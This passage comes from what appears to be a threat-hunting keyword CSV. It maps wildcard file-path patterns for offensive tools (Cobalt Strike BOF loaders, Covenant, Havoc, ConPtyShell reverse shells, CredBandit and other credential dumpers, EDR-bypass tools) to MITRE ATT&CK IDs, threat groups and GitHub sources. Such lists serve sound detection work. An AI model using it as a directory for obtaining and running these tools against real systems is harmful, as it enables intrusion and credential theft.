- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/COFFLoader2/*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" +"*/collection/screengrab*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/combine_harvester.git*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*/comfoo.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*/COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*/COM-Hunter.git*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*/COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*/commandcontrol/malware*.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/common/beacon.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/completions/exegol.fish*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/config/doNmapScanWin.bat *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*/ContainYourself.git*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*/CookieProcessor.cs*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*/Cooolis-ms/*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*/core/browser_darwin.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/core/browser_linux.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/core/browser_windows.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Cracked5pider/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/CrackMapExec.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/crackmapexec/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" +"*/Crassus.git*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*/Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*/crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/createstager.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/credBandit/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of 